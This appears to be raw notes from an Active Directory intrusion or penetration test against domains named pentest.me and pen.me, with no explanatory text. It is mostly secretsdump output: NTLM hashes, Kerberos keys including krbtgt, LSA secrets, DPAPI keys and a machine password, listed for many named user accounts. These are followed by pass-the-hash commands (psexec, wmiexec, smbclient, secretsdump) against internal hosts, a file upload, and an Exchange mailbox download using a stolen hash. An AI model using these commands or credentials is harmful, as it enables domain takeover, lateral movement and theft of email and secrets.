TEST$:1153:aad3b435b51404eeaad3b435b51404ee:00affd88fa323b00d4560bf9fef0ec2f:::
PEN$:1152:aad3b435b51404eeaad3b435b51404ee:307f4c3308181ece9d3d140c669f9641:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d5da6f5ecb1583a5390d63c1a5333509ebdfb5767ab2a01fa075494c54e60da9
Administrator:aes128-cts-hmac-sha1-96:010a385e25f750d8c7ea78773421994b
Administrator:des-cbc-md5:ce38923b97c4cd34
krbtgt:aes256-cts-hmac-sha1-96:76ee18a92c0a42c7e5b30c5788d60166c4c7b59b0517e58ae7247b48fd409125
krbtgt:aes128-cts-hmac-sha1-96:c3c68eac192b5ba2fa65377ce0fba37e
krbtgt:des-cbc-md5:a2e991c8e549a192
pentest.me\usera:aes256-cts-hmac-sha1-96:5fdf67c4123d44fd4cb7b66227b5e04d9ed6ead7d9297a3b7656b426f3c76987
pentest.me\usera:aes128-cts-hmac-sha1-96:5954d0cdc4d8e4877b2ab5e81d2b4e06
pentest.me\usera:des-cbc-md5:fb1c648f103262c2
pentest.me\userb:aes256-cts-hmac-sha1-96:6480a0b1e155fc2bfcdff1a63750a5f091aedf3f72ba7d67db4cb74bffedccaf
pentest.me\userb:aes128-cts-hmac-sha1-96:5d121354953b2f1a984e11b573320843
pentest.me\userb:des-cbc-md5:0e980115f4b3fb31
pentest.me\userc:aes256-cts-hmac-sha1-96:9e842f6424d85dc3fb1d08209405edc99d863d01a677eeeda62598296c4f6f42
pentest.me\userc:aes128-cts-hmac-sha1-96:0505d9ccc384c6d8cd0ad41dbd66f7d9
pentest.me\userc:des-cbc-md5:326279e68abf6bf8
pentest.me\gouhaobo:aes256-cts-hmac-sha1-96:da52b3998cc1805566e4ad0b2e13646fdc555670bfbd4d77f3114a0bd606721a
pentest.me\gouhaobo:aes128-cts-hmac-sha1-96:67d98b660d48d321d5dd2e0bf95e9a3b
pentest.me\gouhaobo:des-cbc-md5:f1b9b93edccb4c25
pentest.me\fuhongchang:aes256-cts-hmac-sha1-96:b9dd56a8b7a9a5dd41564f817bdcac591757af09da2a9086ec11ae11b04d6f8b
pentest.me\fuhongchang:aes128-cts-hmac-sha1-96:aee566fe152488d0376fcb3b2b39aaa3
pentest.me\fuhongchang:des-cbc-md5:16f1b3d31ada9449
pentest.me\liyichun:aes256-cts-hmac-sha1-96:86c54e9bc7672774f6255bb0f7789941999ba3dbe0e2b9d1c3ec3f9d0ef0a28c
pentest.me\liyichun:aes128-cts-hmac-sha1-96:1a74360e0b06c9a5af938bfb87ef3843
pentest.me\liyichun:des-cbc-md5:ecba49aeab7c2319
pentest.me\dingyangxi:aes256-cts-hmac-sha1-96:40e4a4f5915c0d5697929f6a55919ab41a173d519b99dc2d0a32714340ec2b21
pentest.me\dingyangxi:aes128-cts-hmac-sha1-96:1c4abd4da58f54d6574fa48e9d814cec
pentest.me\dingyangxi:des-cbc-md5:a4ad3d7f76c2101c
pentest.me\quxingxiu:aes256-cts-hmac-sha1-96:df8f27e16083632c5ba4b92c7a5f6064a63a2517829633656010f62bc287818a
pentest.me\quxingxiu:aes128-cts-hmac-sha1-96:d34d92a433a99bffd9c10bee9715a437
pentest.me\quxingxiu:des-cbc-md5:b52cc8c1a7e3cbb5
pentest.me\kanxinghua:aes256-cts-hmac-sha1-96:0a286aca85d524a19655a0ac9a8ed838b42866c3cc3218ee6192bb74250d1d02
pentest.me\kanxinghua:aes128-cts-hmac-sha1-96:df36ccd5aa32d9a88a245fa92a1d32f6
pentest.me\kanxinghua:des-cbc-md5:7c0d4fd93eda850b
pentest.me\luzizhuo:aes256-cts-hmac-sha1-96:6a45ac8aefd42ade8c466dae4afbb23bc2abe58417cbcd5f870b752c862960a6
pentest.me\luzizhuo:aes128-cts-hmac-sha1-96:564ae63fd527acab0bbeeb6334f0df2c
pentest.me\luzizhuo:des-cbc-md5:fb7fc81967317a6d
pentest.me\duguangxi:aes256-cts-hmac-sha1-96:d1651833ac41062d5265302ddea6205e2d259e74c53843f346855dd610c50c8b
pentest.me\duguangxi:aes128-cts-hmac-sha1-96:370df932f6cac4048573e0a694aeadba
pentest.me\duguangxi:des-cbc-md5:8a85895b8c6ef176
pentest.me\wenhetai:aes256-cts-hmac-sha1-96:00b0571433354d523732ce05155b244230c9ea7c419eb3996d0a45df9dbe5bdd
pentest.me\wenhetai:aes128-cts-hmac-sha1-96:fb2570c149df8969ab9abd531c89982a
pentest.me\wenhetai:des-cbc-md5:d3c8a28c79203451
pentest.me\jingjun4zhi:aes256-cts-hmac-sha1-96:8af949fca6e52790678e5d5c8e1a5e26fa4abda2efc878f7bf1ec6254e2d5169
pentest.me\jingjun4zhi:aes128-cts-hmac-sha1-96:b06818eb2b466175cc6147737523189a
pentest.me\jingjun4zhi:des-cbc-md5:c10e3eea26c77fe5
pentest.me\nengkangbo:aes256-cts-hmac-sha1-96:efca90637ef648998cfcec61bde02b6fd597a7f6d7c6a3b118e9bba5f5a033ed
pentest.me\nengkangbo:aes128-cts-hmac-sha1-96:69282e96b8ec8dd67ccaabe1e9cfa9b1
pentest.me\nengkangbo:des-cbc-md5:20ae46523eb32945
pentest.me\quepengzu:aes256-cts-hmac-sha1-96:f4a0b87f96ade59838429caf16a0daddcbb7287908092d6593041b2a7135425f
pentest.me\quepengzu:aes128-cts-hmac-sha1-96:ef04e882b9742d78743ca4c0073da656
pentest.me\quepengzu:des-cbc-md5:b00b4cabce70ec83
pentest.me\hongyuhang:aes256-cts-hmac-sha1-96:ebf8e746aa8e90e718b0e6cc50ff34f4d5a2f0405774af5d698f7ae7a3fd67ac
pentest.me\hongyuhang:aes128-cts-hmac-sha1-96:e265ecdd5f1c0642dcbe40aac90bb71e
pentest.me\hongyuhang:des-cbc-md5:b0d3856ef13d3875
pentest.me\jitiancheng:aes256-cts-hmac-sha1-96:5fc81a387e688cf624219b19cc722aec12f5d4f9750018bc1292b56d2aac0946
pentest.me\jitiancheng:aes128-cts-hmac-sha1-96:20926277f6aef9adfb4211ceb28e355e
pentest.me\jitiancheng:des-cbc-md5:eaecc875bc7adf54
pentest.me\xingjinghuan:aes256-cts-hmac-sha1-96:21bac1330589553241283f789db1377e6c0dc3ff1c66199a92085d2b2fc7a228
pentest.me\xingjinghuan:aes128-cts-hmac-sha1-96:89126fef9121c94ac7c0f627ecac9f93
pentest.me\xingjinghuan:des-cbc-md5:07b0512c3e577345
pentest.me\wenyulong:aes256-cts-hmac-sha1-96:5e181a83c5499a9bfa53b58860c765e894c29903a74669fc42c5c5f6f44bffdf
pentest.me\wenyulong:aes128-cts-hmac-sha1-96:0bc14a02e18d6b49c31fc29e3b106950
pentest.me\wenyulong:des-cbc-md5:1634ba5bd5764307
pentest.me\chekaifeng:aes256-cts-hmac-sha1-96:664caba5fabc0376760ddee730bf1d72ba252b78a481a944d343f899711ae1ca
pentest.me\chekaifeng:aes128-cts-hmac-sha1-96:df351849100e6853468c1614982ba25b
pentest.me\chekaifeng:des-cbc-md5:26c29ecd58644a57
pentest.me\niejun4ren:aes256-cts-hmac-sha1-96:7d0c0dfc77347d2e8384a2e2d5a0411215522756ec101385bbb2d14e53d1b2bd
pentest.me\niejun4ren:aes128-cts-hmac-sha1-96:a6f8fec73f1e83685fb4dbebe3925ffe
pentest.me\niejun4ren:des-cbc-md5:6e6b5208fbef38ae
pentest.me\jufeihang:aes256-cts-hmac-sha1-96:d0765350a62fc53f220c31f18c3e9bb1b67e319f6ecd0224782a4308cf24e377
pentest.me\jufeihang:aes128-cts-hmac-sha1-96:1911f69732a03369c4f77d3190723551
pentest.me\jufeihang:des-cbc-md5:643eda3edc574632
pentest.me\wuchengjiao:aes256-cts-hmac-sha1-96:350a3f812a6147bb593b55813c6db18a4320847be480a33eb8df8f2765b73464
pentest.me\wuchengjiao:aes128-cts-hmac-sha1-96:8472ad2b4eb656cfc7ede9fcf47e047d
pentest.me\wuchengjiao:des-cbc-md5:b9ba61808f9b1f7f
pentest.me\ranjingfu:aes256-cts-hmac-sha1-96:fdd48ce07a7339bc531a988c7978f8100b35c8a18e705bcc95d9e5c0414f0535
pentest.me\ranjingfu:aes128-cts-hmac-sha1-96:c58d63d25e28ee04c9b4b380861fd4e0
pentest.me\ranjingfu:des-cbc-md5:6132ea52bf4570ae
pentest.me\nongxuehai:aes256-cts-hmac-sha1-96:ad66f4db829812ec69a2ae5fc8c2fb171ad9b70f5f2f511c189e0e3415de2bf0
pentest.me\nongxuehai:aes128-cts-hmac-sha1-96:45e93f88790ece5d8ddcc573b53377a3
pentest.me\nongxuehai:des-cbc-md5:f845e3fe4a08feba
pentest.me\jianghongcai:aes256-cts-hmac-sha1-96:c0b8f749ad4b0b26b7f397906fbce73df976b5fd8d59c5090b9101c48f50a318
pentest.me\jianghongcai:aes128-cts-hmac-sha1-96:7edb53f4fd8e5761e32515a832d690c5
pentest.me\jianghongcai:des-cbc-md5:f2f2983d9b5743d9
pentest.me\lihaochu:aes256-cts-hmac-sha1-96:b6d9e4ace650c1348897bf80d4c39bce73376b49c2c75d42540ac9cb625d024f
pentest.me\lihaochu:aes128-cts-hmac-sha1-96:68db5728f70e1b41c50fa9c205839b58
pentest.me\lihaochu:des-cbc-md5:e95d327a83629e62
pentest.me\zhongyongge:aes256-cts-hmac-sha1-96:3edc51bd5bfb2208c57d4a52d59b889f2c0929169d59994ff7c7f88030d9ad59
pentest.me\zhongyongge:aes128-cts-hmac-sha1-96:7e740b646e80e3628cc7f9ff19711a03
pentest.me\zhongyongge:des-cbc-md5:0445ce9713dae580
pentest.me\yitianjiao:aes256-cts-hmac-sha1-96:2350bd020ba08f41b81ca535462c16c6383d7af55ba94446c3fed4e53576a61e
pentest.me\yitianjiao:aes128-cts-hmac-sha1-96:68a2b42d93834bdb35c36378e237df9c
pentest.me\yitianjiao:des-cbc-md5:6d85bf205b34dc2a
pentest.me\gongliangzhe:aes256-cts-hmac-sha1-96:72719e83b4690b1574d3892d15ae97180acefa29f7f750bff9f22cfd27a83e97
pentest.me\gongliangzhe:aes128-cts-hmac-sha1-96:80b672b99b06f12d182525c012e17b45
pentest.me\gongliangzhe:des-cbc-md5:373879f88a5b516d
pentest.me\yuzhengcheng:aes256-cts-hmac-sha1-96:3eee6c8dc7ff810dab2b8de6cf96d2833ef9fb3133bc9427602b6980ec0b0848
pentest.me\yuzhengcheng:aes128-cts-hmac-sha1-96:d0a731495f64c16df344746a08f75bcf
pentest.me\yuzhengcheng:des-cbc-md5:f1c11a343be5b04c
pentest.me\taiyuande:aes256-cts-hmac-sha1-96:d1dcb420f2081e9954050f9c078ebbcf71c88f5b886847ed7204d2382e269a2d
pentest.me\taiyuande:aes128-cts-hmac-sha1-96:b30f853ae872e1c1822d26b2fc549651
pentest.me\taiyuande:des-cbc-md5:c758c73d29731c92
pentest.me\shenhongkuo:aes256-cts-hmac-sha1-96:839927e4bf6abab35fac6449b060ffea3555bf831021b9947cc162fa127c5b74
pentest.me\shenhongkuo:aes128-cts-hmac-sha1-96:30d8ed33a8bbbee7dae08978ddf3967b
pentest.me\shenhongkuo:des-cbc-md5:a7ea61251561c268
pentest.me\fanjincheng:aes256-cts-hmac-sha1-96:bf92b57c5e6648adc4f3e567460622173babd2a3dfb8af6cdaff273f493d9c96
pentest.me\fanjincheng:aes128-cts-hmac-sha1-96:b57543c3ebd692f1db8188f4d5ebd17c
pentest.me\fanjincheng:des-cbc-md5:ceba9229455e3b54
pentest.me\weijingshuo:aes256-cts-hmac-sha1-96:f9287869fc1e4443b9a41722274eb58a7ff56bd1e42c379f7931554eb9f4bfb3
pentest.me\weijingshuo:aes128-cts-hmac-sha1-96:ef76225c31b9598070abd839d254fc2b
pentest.me\weijingshuo:des-cbc-md5:5183405e809bf458
pentest.me\shuangliqin:aes256-cts-hmac-sha1-96:9afa2eec549ab174b10f7e9f44afd479769b9d14c0993e1422fe4090b8c77e06
pentest.me\shuangliqin:aes128-cts-hmac-sha1-96:031913784dbc0ee26fbe52de5e227a47
pentest.me\shuangliqin:des-cbc-md5:c1e9299db6aee551
pentest.me\eyongjia:aes256-cts-hmac-sha1-96:942d15e2d81a2b3eb042accd3a85d2e60934493638b56aed2d69d4a7cf7715b9
pentest.me\eyongjia:aes128-cts-hmac-sha1-96:88e729a7672303443a5be54d13b33768
pentest.me\eyongjia:des-cbc-md5:68d9bf43086eb558
pentest.me\lihongguang:aes256-cts-hmac-sha1-96:5559e07a152fb2a7ff08b63a107c276ea404de545bc23a5325a78adccea90437
pentest.me\lihongguang:aes128-cts-hmac-sha1-96:75c7e193c1c10943be4bd125f896db4d
pentest.me\lihongguang:des-cbc-md5:867acead6bb6a7a7
pentest.me\binghongzhen:aes256-cts-hmac-sha1-96:d46fe8dd9beea4d8e7dc35d965694df780da60b75ff16bf6dd415df924369f9f
pentest.me\binghongzhen:aes128-cts-hmac-sha1-96:9590c0bf42541af855ef19ebcade7870
pentest.me\binghongzhen:des-cbc-md5:25e3a146c749344c
pentest.me\guixuyao:aes256-cts-hmac-sha1-96:82686eae79a40a6ff45f32275150feb2b1d7bffbf6619d2d3f062c028849e186
pentest.me\guixuyao:aes128-cts-hmac-sha1-96:f3c09ef04094bbd9aac359b6d64c8814
pentest.me\guixuyao:des-cbc-md5:f2d3494a51b94f0d
pentest.me\fanghanhan:aes256-cts-hmac-sha1-96:968fcf19212a0c062f58ff15ffa3ed27db52d50b3375e3a85ceb5d0da0d5263c
pentest.me\fanghanhan:aes128-cts-hmac-sha1-96:acbb35aedf74b55ebe0a2cacf8bdac33
pentest.me\fanghanhan:des-cbc-md5:86f88a541ac24f5e
DC$:aes256-cts-hmac-sha1-96:6a593d2f3f0e6e196a48a222c557be9bdb37f43f87fc5101ab248792d437212c
DC$:aes128-cts-hmac-sha1-96:b832b7c1fdfe9871afbc80e49da2a6ca
DC$:des-cbc-md5:4c011ac737457c1f
IZMN9U6ZO3VTRNZ$:aes256-cts-hmac-sha1-96:5eff6e5738fdf03c4b58b7c8f42f7ab911c1df3dab369cc3bf79ab411f042855
IZMN9U6ZO3VTRNZ$:aes128-cts-hmac-sha1-96:d80389c690e21ecde1baee163aa1afa5
IZMN9U6ZO3VTRNZ$:des-cbc-md5:198038ead52a5402
IZMN9U6ZO3VTRPZ$:aes256-cts-hmac-sha1-96:f7c897a22820263a9b6c3993c5abc8d1bf8dde0ae18dbc90ccc36d811325d0a2
IZMN9U6ZO3VTRPZ$:aes128-cts-hmac-sha1-96:34b183231afdd0f2a579134998279cdc
IZMN9U6ZO3VTRPZ$:des-cbc-md5:9b2a457a385b462a
IZAYSXE6VCUHB4Z$:aes256-cts-hmac-sha1-96:bc696b4693b02ca9dd7128dbc92cd6a3f93858a0a3809e0d10cf0c04a8bf9b77
IZAYSXE6VCUHB4Z$:aes128-cts-hmac-sha1-96:0f404e39fe1a7cd118ec43e090c55e7a
IZAYSXE6VCUHB4Z$:des-cbc-md5:abaec8625b8a1cd9
TEST$:aes256-cts-hmac-sha1-96:6b91d4434cd5ec81a232cf743c9f966c4ca8b1d1f503f0ec93baac592ec04ae1
TEST$:aes128-cts-hmac-sha1-96:28124f510d809dd692307a235120a536
TEST$:des-cbc-md5:04a1e092c7975431
PEN$:aes256-cts-hmac-sha1-96:6e87f4986b1c9742b27f06a34ba9e71315813a2f0035959fc6da4e32652333ff
PEN$:aes128-cts-hmac-sha1-96:59e0d781c2820844fd8ff818cba8634f
PEN$:des-cbc-md5:ad85aea4075297df
[*] Cleaning up...

psexec.py administrator@172.24.7.3 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -codec gbk

psexec.py pentest/administrator@172.24.7.43 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -codec gbk

wmicexec.py pentest/administrator@172.24.7.48 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -codec gbk

psexec.py pentest/administrator@172.24.7.5 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -codec gbk
dir \\dcadmin.pen.me\c$

secretsdump.py pentest.me/administrator@172.24.7.5 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -dc-ip 172.24.7.5

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x54028728cd0f6f79afa4896f1d07ea85
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c339cf871da141b43386b232f2466d0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PEN\DCadmin$:aes256-cts-hmac-sha1-96:831fe5130f7b81bf8c62386306681d528408d74567152c4c59b7ee0fbabbedb2
PEN\DCadmin$:aes128-cts-hmac-sha1-96:ff88abc8419a4f1f644dba1b5af4c318
PEN\DCadmin$:des-cbc-md5:54c8a2378025b38c
PEN\DCadmin$:plain_password_hex:4fff3075916eefd02e46cf997a3d8be03f28e62618a788c789a8d3a192c4e890140dbe6c688f6e972e54c60c97d88273b597b829b1bce4f04d2d0e54e3010064d3b87112c0b8fdc6e69163206a20d6ef5a34db8f78711938f9e22674f45acc22895855f8d3f7310e7f9e749c4f48f3c468f74884140db04d79595484c48d8096f4ea4a0d8d1d47dac9a369c3ded71582153286424f9275f99d7ff2973794ec6d8d02e07ac53e98017ec3d9f58f959d60534e249144a77f01d4bd586614430fb4b48a0877123054e03f15377fbeca7bda36220927efd7fbb7667944e13655ecab028c55d7cee18b74f57cfebb3dd1ef9d
PEN\DCadmin$:aad3b435b51404eeaad3b435b51404ee:a31d20b6f435ab36509b3a119a4f1d95:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x8357c8f566f861b6eb62818ba431abf9ae7956ed
dpapi_userkey:0x7010dda34979af5b3b2b081aeccd6966a0b296da
[*] NL$KM
 0000   9D 83 14 71 4B 67 2E 66  8B 36 79 E5 74 94 DF CE   ...qKg.f.6y.t...
 0010   F8 0F 28 EC 6A 7A 89 28  4F F7 D1 07 B7 9A B8 6E   ..(.jz.(O......n
 0020   14 76 A6 CC 5E 52 A4 86  86 55 3A C1 37 51 5D 87   .v..^R...U:.7Q].
 0030   3D 33 6E A7 45 EE 79 E8  89 60 CC A6 AA 98 58 EE   =3n.E.y..`....X.
NL$KM:9d8314714b672e668b3679e57494dfcef80f28ec6a7a89284ff7d107b79ab86e1476a6cc5e52a48686553ac137515d873d336ea745ee79e88960cca6aa9858ee
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
pen.me\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f91138ef5392b87416ed41cb6e810b7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d72190307a2b763c222714e0eebc339:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\$431000-9LF00TRKAIIC:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_21baf503acf944adb:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_86d7f51fac504d10b:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_5499dba5058d4735b:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_4969a77b2f01469cb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_3c7e4e650fe944fbb:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_823df2fc495d43cc8:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_24646eb63333484e8:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_de5632833a404141a:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_3f73ae625e834c9a8:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\HealthMailbox7e80c8e:1135:aad3b435b51404eeaad3b435b51404ee:b35d9ed6c91c742398aeb117d432b80c:::
pen.me\HealthMailboxeda7e80:1136:aad3b435b51404eeaad3b435b51404ee:922beda4625d5aeb3663a6e54342ea69:::
pen.me\HealthMailbox285895e:1137:aad3b435b51404eeaad3b435b51404ee:511c807cd8e59b000bc312255543e5fd:::
pen.me\HealthMailbox51cfeb1:1138:aad3b435b51404eeaad3b435b51404ee:f305168ff895e29d3745888c6a793002:::
pen.me\HealthMailboxc4b8425:1139:aad3b435b51404eeaad3b435b51404ee:18e23133d26cdb9739e242d8bbc34809:::
pen.me\HealthMailbox528d2e1:1140:aad3b435b51404eeaad3b435b51404ee:e4a755e4a52824dff8fbc0bdc407f72b:::
pen.me\HealthMailboxc5e00fd:1141:aad3b435b51404eeaad3b435b51404ee:08333ec70b3f1f6a0d1d72d96e3d04b6:::
pen.me\HealthMailboxee2d866:1142:aad3b435b51404eeaad3b435b51404ee:ef20a63fe85c29209f1e248370968513:::
pen.me\HealthMailbox190d1f5:1143:aad3b435b51404eeaad3b435b51404ee:bbac9374b2dda3615fbfc262489839ab:::
pen.me\HealthMailbox45dde9b:1144:aad3b435b51404eeaad3b435b51404ee:dcb96076b068d0a73b2e1adbd23a1bd2:::
pen.me\HealthMailboxbb65e08:1145:aad3b435b51404eeaad3b435b51404ee:f3839bb82cf1c86713244f7e72623607:::
pen.me\userd:1146:aad3b435b51404eeaad3b435b51404ee:b8e52066381b9c3d08d8661a0c0d5a72:::
pen.me\exchange:1148:aad3b435b51404eeaad3b435b51404ee:21a43bd74a20a330ef77a4e7bd179d8c:::
DCADMIN$:1000:aad3b435b51404eeaad3b435b51404ee:a31d20b6f435ab36509b3a119a4f1d95:::
IZ1TUCEKFDPCEMZ$:1104:aad3b435b51404eeaad3b435b51404ee:96bf1afb33026f219bb16f7d9d3d4e78:::
IZ88QYK8Y8Y3VXZ$:1147:aad3b435b51404eeaad3b435b51404ee:0c11dedcf21d317c4626e4bff133fad3:::
PENTEST$:1149:aad3b435b51404eeaad3b435b51404ee:c8327547b8c01d2b4afdc5d4ad3846e4:::
[*] Kerberos keys grabbed
pen.me\Administrator:aes256-cts-hmac-sha1-96:aa003d0f53e6c5a8dd28e22b4e6b87340151d230f223f8e156c333bb59c65644
pen.me\Administrator:aes128-cts-hmac-sha1-96:dc24b2b0b854a4decd23582da613919e
pen.me\Administrator:des-cbc-md5:e368d962bacbe097
krbtgt:aes256-cts-hmac-sha1-96:3a72075a3affbc661707a01cf93dcd845ed669978279ff7af2173543a5bd5b7a
krbtgt:aes128-cts-hmac-sha1-96:77fd505df070d3422cd1a19108420d8b
krbtgt:des-cbc-md5:1cfd7fe69498c48f
pen.me\HealthMailbox7e80c8e:aes256-cts-hmac-sha1-96:02fce72c7f20c3bb2134937dcb5deb01ed88ef459324e3b8e7da4d5e4494d282
pen.me\HealthMailbox7e80c8e:aes128-cts-hmac-sha1-96:1ff9878c362d232a7f90ffaacc860a8f
pen.me\HealthMailbox7e80c8e:des-cbc-md5:9b8940328f43a41a
pen.me\HealthMailboxeda7e80:aes256-cts-hmac-sha1-96:09761bcc5edd87bf26850b559705959383bc36afad0d39a8b3d0ab5afa068938
pen.me\HealthMailboxeda7e80:aes128-cts-hmac-sha1-96:8ec3fd930227af6aa5d42d0579ce59de
pen.me\HealthMailboxeda7e80:des-cbc-md5:8f670ef294cd80a2
pen.me\HealthMailbox285895e:aes256-cts-hmac-sha1-96:ca046e53700796fb14d1e6ac6be9b731749db13155ebaa9fc8bf849ec2a741a6
pen.me\HealthMailbox285895e:aes128-cts-hmac-sha1-96:e21f515b3a570a2d7a34fc07a395d5eb
pen.me\HealthMailbox285895e:des-cbc-md5:57c801673ed0bfd9
pen.me\HealthMailbox51cfeb1:aes256-cts-hmac-sha1-96:44b6bbb662ae92da5efc1c89374b36715ff30ec7573c02b008754661d3a2d0f8
pen.me\HealthMailbox51cfeb1:aes128-cts-hmac-sha1-96:b95a8c3c49a94ff83da78e2b45592f97
pen.me\HealthMailbox51cfeb1:des-cbc-md5:e367548ca2e6e58c
pen.me\HealthMailboxc4b8425:aes256-cts-hmac-sha1-96:bc5465a163df0842aa0626b16144a8e518cbebfa2dc2a3154d26c41c8e4ac53c
pen.me\HealthMailboxc4b8425:aes128-cts-hmac-sha1-96:4108c2df675446b290742916b3b9ec32
pen.me\HealthMailboxc4b8425:des-cbc-md5:61b031f194f2c1dc
pen.me\HealthMailbox528d2e1:aes256-cts-hmac-sha1-96:3726249220638dccab3ea5c39bd5bd2f41cb21a24e3679d5f72f64a4f4ac81a5
pen.me\HealthMailbox528d2e1:aes128-cts-hmac-sha1-96:5e79c4d2f9ec7d72aca8cbe84f73d0f9
pen.me\HealthMailbox528d2e1:des-cbc-md5:8370d352f2169b4f
pen.me\HealthMailboxc5e00fd:aes256-cts-hmac-sha1-96:bd7b3c2a7d0379ed713252195380ee07612cb1727ff2eb1921898ba265e5a7cc
pen.me\HealthMailboxc5e00fd:aes128-cts-hmac-sha1-96:d3b39c0815d4b99e6c9bdcf384214d10
pen.me\HealthMailboxc5e00fd:des-cbc-md5:3eaedaea9b4cdfc1
pen.me\HealthMailboxee2d866:aes256-cts-hmac-sha1-96:f8102e19d48a7c029c6c95ffe70e801386c9e2719dee3c935c3c27d78ba1b4c6
pen.me\HealthMailboxee2d866:aes128-cts-hmac-sha1-96:ffe40245591c77b6421734360c4ff665
pen.me\HealthMailboxee2d866:des-cbc-md5:022649d6c2d979ab
pen.me\HealthMailbox190d1f5:aes256-cts-hmac-sha1-96:ad9e44a57f30926c0f68a38151b2bcf09d54945d09867a7a1824a475a90712f4
pen.me\HealthMailbox190d1f5:aes128-cts-hmac-sha1-96:06988d81ef1af625370abee3885d9e71
pen.me\HealthMailbox190d1f5:des-cbc-md5:1394a81661fddf04
pen.me\HealthMailbox45dde9b:aes256-cts-hmac-sha1-96:7428e94c5b087cb520e2d653c79c3a06f0d4f3d041a5f6a3678f145df40ed692
pen.me\HealthMailbox45dde9b:aes128-cts-hmac-sha1-96:f5be9c837cedac4b1b856e4c3da44bff
pen.me\HealthMailbox45dde9b:des-cbc-md5:adabeca7e6a71a8c
pen.me\HealthMailboxbb65e08:aes256-cts-hmac-sha1-96:6db909d2c5457125a4cd0720408cc6057919c89f20afedd18dcacbeb72ab9f98
pen.me\HealthMailboxbb65e08:aes128-cts-hmac-sha1-96:13ae7b3b85d8374cb7ecf705ea5609c6
pen.me\HealthMailboxbb65e08:des-cbc-md5:8fa7fbe9645df11c
pen.me\userd:aes256-cts-hmac-sha1-96:516fcce3511871af4239e3cfd61f23fbb3ae2cbe2d3417b080f2cdd72d03ce3d
pen.me\userd:aes128-cts-hmac-sha1-96:fc0ffc27c1ab4185739f9e18dbfd6383
pen.me\userd:des-cbc-md5:a45726a79ba8bc2f
pen.me\exchange:aes256-cts-hmac-sha1-96:f265e64d7428db55e4d423ec80776c2bc05476696db7a730b223e8e768b8ee25
pen.me\exchange:aes128-cts-hmac-sha1-96:9d27741e522e2050487c1a224ab56b53
pen.me\exchange:des-cbc-md5:51f4d9a820f46129
DCADMIN$:aes256-cts-hmac-sha1-96:831fe5130f7b81bf8c62386306681d528408d74567152c4c59b7ee0fbabbedb2
DCADMIN$:aes128-cts-hmac-sha1-96:ff88abc8419a4f1f644dba1b5af4c318
DCADMIN$:des-cbc-md5:ae32322c6d16e35b
IZ1TUCEKFDPCEMZ$:aes256-cts-hmac-sha1-96:f154935b911891bbc2020fbbff9cc57b585eac7195890806163e7ca15765c386
IZ1TUCEKFDPCEMZ$:aes128-cts-hmac-sha1-96:339faf0f866e55c4a955585ac85b2e07
IZ1TUCEKFDPCEMZ$:des-cbc-md5:26791a73ba3b7549
IZ88QYK8Y8Y3VXZ$:aes256-cts-hmac-sha1-96:01454db4b94a26ba1432e94fd122ab244ac0de3a5aa1eeeadd561a9ae081e177
IZ88QYK8Y8Y3VXZ$:aes128-cts-hmac-sha1-96:cc441303c088a6064c13dc873a45d286
IZ88QYK8Y8Y3VXZ$:des-cbc-md5:abc1adc81c7334a7
PENTEST$:aes256-cts-hmac-sha1-96:189ddfd33fa311848e6eb246a4561b090d938527cff727f2305f3d9a82aaf480
PENTEST$:aes128-cts-hmac-sha1-96:0d474a6afb33441d51df2bbb5e29c35a
PENTEST$:des-cbc-md5:0b29cd1a4f454f52

wmiexec.py pen.me/Administrator@172.24.7.5 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk

smbclient.py  pen.me/Administrator@172.24.7.5 -hashes :0f91138ef5392b87416ed41cb6e810b7

use c$
put xxxxx

wmiexec.py pen.me/administrator@172.25.12.19 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk

python .\pthexchange.py --target https://172.25.12.19/ --username exchange --password '00000000000000000000000000000000:21a43bd74a20a330ef77a4e7bd179d8c' --action Download

wmiexec.py pen.me/administrator@172.25.12.29 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk

smbclient.py pentest.me/Administrator@172.24.7.43 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1

use c$
